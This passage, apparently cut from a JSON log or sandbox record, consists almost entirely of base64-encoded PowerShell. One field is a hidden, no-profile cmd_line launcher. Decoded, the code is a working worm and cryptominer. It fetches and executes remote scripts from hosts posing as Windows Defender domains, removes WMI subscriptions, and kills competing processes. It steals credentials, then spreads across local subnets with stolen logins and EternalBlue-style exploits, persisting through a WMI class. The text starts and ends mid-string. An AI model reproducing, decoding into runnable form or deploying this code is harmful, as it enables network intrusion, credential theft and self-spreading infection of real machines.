AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuA